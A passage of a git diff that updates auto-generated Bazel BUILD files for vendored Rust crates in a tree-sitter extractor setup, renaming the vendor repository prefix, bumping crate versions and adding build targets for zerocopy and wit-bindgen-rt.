"@vendor__windows_x86_64_msvc-0.48.5//:build_script_build", + "@vendor_ts__windows_x86_64_msvc-0.48.5//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel index 5c2d37dbca84..df8d9024f53c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows_x86_64_msvc-0.52.6.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.52.6", deps = [ - "@vendor__windows_x86_64_msvc-0.52.6//:build_script_build", + "@vendor_ts__windows_x86_64_msvc-0.52.6//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.6.24.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.7.3.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.6.24.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.7.3.bazel index e5cef505d453..4c327dadb1db 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.6.24.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winnow-0.7.3.bazel @@ -84,5 +84,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.6.24", + version = "0.7.3", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel new file mode 100644 index 000000000000..01f119aef6f8 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel @@ -0,0 +1,142 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//cargo:defs.bzl", "cargo_build_script") +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "wit_bindgen_rt", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=wit-bindgen-rt", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.33.0", + deps = [ + "@vendor_ts__wit-bindgen-rt-0.33.0//:build_script_build", + ], +) + +cargo_build_script( + name = "_bs", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + "**/*.rs", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_name = "build_script_build", + crate_root = "build.rs", + data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + edition = "2021", + pkg_name = "wit-bindgen-rt", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=wit-bindgen-rt", + "manual", + "noclippy", + "norustfmt", + ], + version = "0.33.0", + visibility = ["//visibility:private"], +) + +alias( + name = "build_script_build", + actual = ":_bs", + tags = ["manual"], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel index ac2c3dbf2572..04a723e7bd5c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.7.35.bazel @@ -38,7 +38,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__zerocopy-derive-0.7.35//:zerocopy_derive", + "@vendor_ts__zerocopy-derive-0.7.35//:zerocopy_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -91,6 +91,6 @@ rust_library( }), version = "0.7.35", deps = [ - "@vendor__byteorder-1.5.0//:byteorder", + "@vendor_ts__byteorder-1.5.0//:byteorder", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel new file mode 100644 index 000000000000..2e234c58a3be --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel @@ -0,0 +1,148 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//cargo:defs.bzl", "cargo_build_script") +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "zerocopy", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "simd", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=zerocopy", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.8.20", + deps = [ + "@vendor_ts__zerocopy-0.8.20//:build_script_build", + ], +) + +cargo_build_script( + name = "_bs", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + "**/*.rs", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "simd", + ], + crate_name = "build_script_build", + crate_root = "build.rs", + data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + edition = "2021", + pkg_name = "zerocopy", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=zerocopy", + "manual", + "noclippy", + "norustfmt", + ], + version = "0.8.20", + visibility = ["//visibility:private"], +) + +alias( + name = "build_script_build", + actual = ":_bs", + tags = ["manual"], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel index b457d85d3503..a3bb7ebae970 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.7.35.bazel @@ -81,8 +81,8 @@ rust_proc_macro( }), version = "0.7.35", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel new file mode 100644 index 000000000000..0f6480931fcb --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel @@ -0,0 +1,88 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_proc_macro") + +package(default_visibility = ["//visibility:public"]) + +rust_proc_macro( + name = "zerocopy_derive", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=zerocopy-derive", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.8.20", + deps = [ + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl b/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl index 932b9ce66d0b..6d6d80ef58ce 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/crates.bzl @@ -22,11 +22,11 @@ def crate_repositories(): """ maybe( crates_vendor_remote_repository, - name = "vendor", + name = "vendor_ts", build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.bazel"), defs_module = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:defs.bzl"), ) - direct_deps = [struct(repo = "vendor", is_dev_dep = False)] + direct_deps = [struct(repo = "vendor_ts", is_dev_dep = False)] direct_deps.extend(_crate_repositories()) return direct_deps diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl b/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl index bd5fbaf27ae0..ff89ab88d59e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/defs.bzl @@ -296,89 +296,89 @@ def aliases( _NORMAL_DEPENDENCIES = { "ruby/extractor": { _COMMON_CONDITION: { - "clap": Label("@vendor__clap-4.5.26//:clap"), - "encoding": Label("@vendor__encoding-0.2.33//:encoding"), - "lazy_static": Label("@vendor__lazy_static-1.5.0//:lazy_static"), - "rayon": Label("@vendor__rayon-1.10.0//:rayon"), - "regex": Label("@vendor__regex-1.11.1//:regex"), - "tracing": Label("@vendor__tracing-0.1.41//:tracing"), - "tracing-subscriber": Label("@vendor__tracing-subscriber-0.3.19//:tracing_subscriber"), - "tree-sitter": Label("@vendor__tree-sitter-0.24.6//:tree_sitter"), - "tree-sitter-embedded-template": Label("@vendor__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template"), - "tree-sitter-ruby": Label("@vendor__tree-sitter-ruby-0.23.1//:tree_sitter_ruby"), + "clap": Label("@vendor_ts__clap-4.5.31//:clap"), + "encoding": Label("@vendor_ts__encoding-0.2.33//:encoding"), + "lazy_static": Label("@vendor_ts__lazy_static-1.5.0//:lazy_static"), + "rayon": Label("@vendor_ts__rayon-1.10.0//:rayon"), + "regex": Label("@vendor_ts__regex-1.11.1//:regex"), + "tracing": Label("@vendor_ts__tracing-0.1.41//:tracing"), + "tracing-subscriber": Label("@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber"), + "tree-sitter": Label("@vendor_ts__tree-sitter-0.24.6//:tree_sitter"), + "tree-sitter-embedded-template": Label("@vendor_ts__tree-sitter-embedded-template-0.23.2//:tree_sitter_embedded_template"), + "tree-sitter-ruby": Label("@vendor_ts__tree-sitter-ruby-0.23.1//:tree_sitter_ruby"), }, }, "rust/ast-generator": { _COMMON_CONDITION: { - "anyhow": Label("@vendor__anyhow-1.0.95//:anyhow"), - "either": Label("@vendor__either-1.13.0//:either"), - "itertools": Label("@vendor__itertools-0.14.0//:itertools"), - "mustache": Label("@vendor__mustache-0.9.0//:mustache"), - "proc-macro2": Label("@vendor__proc-macro2-1.0.93//:proc_macro2"), - "quote": Label("@vendor__quote-1.0.38//:quote"), - "serde": Label("@vendor__serde-1.0.217//:serde"), - "stdx": Label("@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx"), - "ungrammar": Label("@vendor__ungrammar-1.16.1//:ungrammar"), + "anyhow": Label("@vendor_ts__anyhow-1.0.96//:anyhow"), + "either": Label("@vendor_ts__either-1.14.0//:either"), + "itertools": Label("@vendor_ts__itertools-0.14.0//:itertools"), + "mustache": Label("@vendor_ts__mustache-0.9.0//:mustache"), + "proc-macro2": Label("@vendor_ts__proc-macro2-1.0.93//:proc_macro2"), + "quote": Label("@vendor_ts__quote-1.0.38//:quote"), + "serde": Label("@vendor_ts__serde-1.0.218//:serde"), + "stdx": Label("@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx"), + "ungrammar": Label("@vendor_ts__ungrammar-1.16.1//:ungrammar"), }, }, "rust/autobuild": { }, "rust/extractor": { _COMMON_CONDITION: { - "anyhow": Label("@vendor__anyhow-1.0.95//:anyhow"), - "argfile": Label("@vendor__argfile-0.2.1//:argfile"), - "chrono": Label("@vendor__chrono-0.4.39//:chrono"), - "clap": Label("@vendor__clap-4.5.26//:clap"), - "dunce": Label("@vendor__dunce-1.0.5//:dunce"), - "figment": Label("@vendor__figment-0.10.19//:figment"), - "glob": Label("@vendor__glob-0.3.2//:glob"), - "itertools": Label("@vendor__itertools-0.14.0//:itertools"), - "num-traits": Label("@vendor__num-traits-0.2.19//:num_traits"), - "ra_ap_base_db": Label("@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db"), - "ra_ap_cfg": Label("@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg"), - "ra_ap_hir": Label("@vendor__ra_ap_hir-0.0.258//:ra_ap_hir"), - "ra_ap_hir_def": Label("@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def"), - "ra_ap_hir_expand": Label("@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand"), - "ra_ap_ide_db": Label("@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db"), - "ra_ap_intern": Label("@vendor__ra_ap_intern-0.0.258//:ra_ap_intern"), - "ra_ap_load-cargo": Label("@vendor__ra_ap_load-cargo-0.0.258//:ra_ap_load_cargo"), - "ra_ap_parser": Label("@vendor__ra_ap_parser-0.0.258//:ra_ap_parser"), - "ra_ap_paths": Label("@vendor__ra_ap_paths-0.0.258//:ra_ap_paths"), - "ra_ap_project_model": Label("@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model"), - "ra_ap_span": Label("@vendor__ra_ap_span-0.0.258//:ra_ap_span"), - "ra_ap_syntax": Label("@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax"), - "ra_ap_vfs": Label("@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs"), - "serde": Label("@vendor__serde-1.0.217//:serde"), - "serde_json": Label("@vendor__serde_json-1.0.135//:serde_json"), - "serde_with": Label("@vendor__serde_with-3.12.0//:serde_with"), - "toml": Label("@vendor__toml-0.8.19//:toml"), - "tracing": Label("@vendor__tracing-0.1.41//:tracing"), - "tracing-flame": Label("@vendor__tracing-flame-0.2.0//:tracing_flame"), - "tracing-subscriber": Label("@vendor__tracing-subscriber-0.3.19//:tracing_subscriber"), - "triomphe": Label("@vendor__triomphe-0.1.14//:triomphe"), + "anyhow": Label("@vendor_ts__anyhow-1.0.96//:anyhow"), + "argfile": Label("@vendor_ts__argfile-0.2.1//:argfile"), + "chrono": Label("@vendor_ts__chrono-0.4.39//:chrono"), + "clap": Label("@vendor_ts__clap-4.5.31//:clap"), + "dunce": Label("@vendor_ts__dunce-1.0.5//:dunce"), + "figment": Label("@vendor_ts__figment-0.10.19//:figment"), + "glob": Label("@vendor_ts__glob-0.3.2//:glob"), + "itertools": Label("@vendor_ts__itertools-0.14.0//:itertools"), + "num-traits": Label("@vendor_ts__num-traits-0.2.19//:num_traits"), + "ra_ap_base_db": Label("@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db"), + "ra_ap_cfg": Label("@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg"), + "ra_ap_hir": Label("@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir"), + "ra_ap_hir_def": Label("@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def"), + "ra_ap_hir_expand": Label("@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand"), + "ra_ap_ide_db": Label("@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db"), + "ra_ap_intern": Label("@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern"), + "ra_ap_load-cargo": Label("@vendor_ts__ra_ap_load-cargo-0.0.266//:ra_ap_load_cargo"), + "ra_ap_parser": Label("@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser"), + "ra_ap_paths": Label("@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths"), + "ra_ap_project_model": Label("@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model"), + "ra_ap_span": Label("@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span"), + "ra_ap_syntax": Label("@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax"), + "ra_ap_vfs": Label("@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs"), + "serde": Label("@vendor_ts__serde-1.0.218//:serde"), + "serde_json": Label("@vendor_ts__serde_json-1.0.139//:serde_json"), + "serde_with": Label("@vendor_ts__serde_with-3.12.0//:serde_with"), + "toml": Label("@vendor_ts__toml-0.8.20//:toml"), + "tracing": Label("@vendor_ts__tracing-0.1.41//:tracing"), + "tracing-flame": Label("@vendor_ts__tracing-flame-0.2.0//:tracing_flame"), + "tracing-subscriber": Label("@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber"), + "triomphe": Label("@vendor_ts__triomphe-0.1.14//:triomphe"), }, }, "rust/extractor/macros": { _COMMON_CONDITION: { - "quote": Label("@vendor__quote-1.0.38//:quote"), - "syn": Label("@vendor__syn-2.0.96//:syn"), + "quote": Label("@vendor_ts__quote-1.0.38//:quote"), + "syn": Label("@vendor_ts__syn-2.0.98//:syn"), }, }, "shared/tree-sitter-extractor": { _COMMON_CONDITION: { - "chrono": Label("@vendor__chrono-0.4.39//:chrono"), - "encoding": Label("@vendor__encoding-0.2.33//:encoding"), - "flate2": Label("@vendor__flate2-1.0.35//:flate2"), - "globset": Label("@vendor__globset-0.4.15//:globset"), - "lazy_static": Label("@vendor__lazy_static-1.5.0//:lazy_static"), - "num_cpus": Label("@vendor__num_cpus-1.16.0//:num_cpus"), - "rayon": Label("@vendor__rayon-1.10.0//:rayon"), - "regex": Label("@vendor__regex-1.11.1//:regex"), - "serde": Label("@vendor__serde-1.0.217//:serde"), - "serde_json": Label("@vendor__serde_json-1.0.135//:serde_json"), - "tracing": Label("@vendor__tracing-0.1.41//:tracing"), - "tracing-subscriber": Label("@vendor__tracing-subscriber-0.3.19//:tracing_subscriber"), - "tree-sitter": Label("@vendor__tree-sitter-0.24.6//:tree_sitter"), + "chrono": Label("@vendor_ts__chrono-0.4.39//:chrono"), + "encoding": Label("@vendor_ts__encoding-0.2.33//:encoding"), + "flate2": Label("@vendor_ts__flate2-1.1.0//:flate2"), + "globset": Label("@vendor_ts__globset-0.4.15//:globset"), + "lazy_static": Label("@vendor_ts__lazy_static-1.5.0//:lazy_static"), + "num_cpus": Label("@vendor_ts__num_cpus-1.16.0//:num_cpus"), + "rayon": Label("@vendor_ts__rayon-1.10.0//:rayon"), + "regex": Label("@vendor_ts__regex-1.11.1//:regex"), + "serde": Label("@vendor_ts__serde-1.0.218//:serde"), + "serde_json": Label("@vendor_ts__serde_json-1.0.139//:serde_json"), + "tracing": Label("@vendor_ts__tracing-0.1.41//:tracing"), + "tracing-subscriber": Label("@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber"), + "tree-sitter": Label("@vendor_ts__tree-sitter-0.24.6//:tree_sitter"), }, }, } @@ -390,7 +390,7 @@ _NORMAL_ALIASES = { }, "rust/ast-generator": { _COMMON_CONDITION: { - Label("@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx"): "stdx", + Label("@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx"): "stdx", }, }, "rust/autobuild": { @@ -422,9 +422,9 @@ _NORMAL_DEV_DEPENDENCIES = { }, "shared/tree-sitter-extractor": { _COMMON_CONDITION: { - "rand": Label("@vendor__rand-0.8.5//:rand"), - "tree-sitter-json": Label("@vendor__tree-sitter-json-0.24.8//:tree_sitter_json"), - "tree-sitter-ql": Label("@vendor__tree-sitter-ql-0.23.1//:tree_sitter_ql"), + "rand": Label("@vendor_ts__rand-0.9.0//:rand"), + "tree-sitter-json": Label("@vendor_ts__tree-sitter-json-0.24.8//:tree_sitter_json"), + "tree-sitter-ql": Label("@vendor_ts__tree-sitter-ql-0.23.1//:tree_sitter_ql"), }, }, } @@ -584,16 +584,24 @@ _CONDITIONS = { "armv7-linux-androideabi": ["@rules_rust//rust/platform:armv7-linux-androideabi"], "armv7-unknown-linux-gnueabi": ["@rules_rust//rust/platform:armv7-unknown-linux-gnueabi"], "cfg(all(any(target_arch = \"x86_64\", target_arch = \"arm64ec\"), target_env = \"msvc\", not(windows_raw_dylib)))": ["@rules_rust//rust/platform:x86_64-pc-windows-msvc"], + "cfg(all(any(target_os = \"linux\", target_os = \"android\"), not(any(getrandom_backend = \"custom\", getrandom_backend = \"rdrand\", getrandom_backend = \"rndr\"))))": ["@rules_rust//rust/platform:aarch64-linux-android", "@rules_rust//rust/platform:aarch64-unknown-linux-gnu", "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu", "@rules_rust//rust/platform:arm-unknown-linux-gnueabi", "@rules_rust//rust/platform:armv7-linux-androideabi", "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi", "@rules_rust//rust/platform:i686-linux-android", "@rules_rust//rust/platform:i686-unknown-linux-gnu", "@rules_rust//rust/platform:powerpc-unknown-linux-gnu", "@rules_rust//rust/platform:s390x-unknown-linux-gnu", "@rules_rust//rust/platform:x86_64-linux-android", "@rules_rust//rust/platform:x86_64-unknown-linux-gnu", 